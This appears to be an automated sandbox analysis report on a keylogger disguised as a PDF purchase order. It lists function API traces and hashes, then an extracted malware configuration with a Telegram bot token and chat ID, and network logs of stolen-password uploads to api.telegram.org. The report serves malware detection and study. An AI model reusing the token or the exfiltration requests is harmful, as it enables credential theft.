Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNEL32(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 00405683 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00405C59 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92

Strings

nsa, xrefs: 00405C66

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe.7716.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49803 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49742 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49785 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49875 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49898 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49827 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49863 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49885 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49850 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49815 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49839 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49907 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e18c888856fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e43f72e9d46Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1edc6a8bed6eHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f3010ecdd81Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f5c280312c3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f9130a6ddecHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fc089a266c5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1feba30ad185Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd203aaca394ffHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd208b8ee19467Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20cb4a9bb649Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
